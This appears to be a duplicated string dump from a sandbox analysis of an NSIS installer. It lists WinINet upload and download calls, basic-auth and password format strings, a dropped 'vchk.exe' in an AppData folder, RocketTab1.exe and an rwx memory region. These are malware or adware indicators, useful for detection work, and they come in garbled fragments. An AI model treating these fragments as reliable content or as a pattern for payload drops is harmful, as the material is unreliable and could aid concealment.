CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp\nsExec.dll
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiF.tmp
.reloc
.reloc
SShL0
SShL0
PeekNamedPipe
PeekNamedPipe
CreatePipe
CreatePipe
nsExec.dll
nsExec.dll
9Â9|9
9Â9|9
: :0:5:>:
: :0:5:>:
u.Uj@
u.Uj@
MSVCRT.dll
MSVCRT.dll
HttpSendRequestA
HttpSendRequestA
HttpSendRequestExA
HttpSendRequestExA
HttpQueryInfoA
HttpQueryInfoA
FtpCreateDirectoryA
FtpCreateDirectoryA
FtpOpenFileA
FtpOpenFileA
HttpOpenRequestA
HttpOpenRequestA
HttpAddRequestHeadersA
HttpAddRequestHeadersA
HttpEndRequestA
HttpEndRequestA
InternetCrackUrlA
InternetCrackUrlA
WININET.dll
WININET.dll
inetc.dll
inetc.dll
Open URL Error
Open URL Error
URL Parts Error
URL Parts Error
FtpCreateDir failed (550)
FtpCreateDir failed (550)
Error FTP path (550)
Error FTP path (550)
Downloading %s
Downloading %s
%dkB (%d%%) of %dkB @ %d.dkB/s
%dkB (%d%%) of %dkB @ %d.dkB/s
(%d %s%s remaining)
(%d %s%s remaining)
REST %d
REST %d
SIZE %s
SIZE %s
Content-Length: %d
Content-Length: %d
Content-Type: application/x-www-form-urlencoded
Content-Type: application/x-www-form-urlencoded
Authorization: basic %s
Authorization: basic %s
Proxy-authorization: basic %s
Proxy-authorization: basic %s
%s:%s
%s:%s
FtpCommandA
FtpCommandA
wininet.dll
wininet.dll
%u MB
%u MB
%u kB
%u kB
%u bytes
%u bytes
%d:d:d
%d:d:d
%s - %s
%s - %s
(Err=%d)
(Err=%d)
NSIS_Inetc (Mozilla)
NSIS_Inetc (Mozilla)
Filename: %s
Filename: %s
/password
/password
Uploading %s
Uploading %s
9!9-9B9}9
9!9-9B9}9
g.ZO||k[
g.ZO||k[
C:\a\avchk.txt
C:\a\avchk.txt
avchk.txt
avchk.txt
\LOCALS~1\Temp\nsiF.tmp
\LOCALS~1\Temp\nsiF.tmp
hk.txt
hk.txt
cketTab1.exe
cketTab1.exe
e.exe
e.exe
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
"%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe"
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani
vchk.exe
vchk.exe
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiE.tmp
CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsiE.tmp
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
%Documents and Settings%\%current user%\Local Settings\Application Data\yuntnani\vchk.exe
RocketTab1.exe
RocketTab1.exe
Nullsoft Install System v2.46
Nullsoft Install System v2.46
vchk.exe_1976_rwx_10004000_00001000:
callback%d
callback%d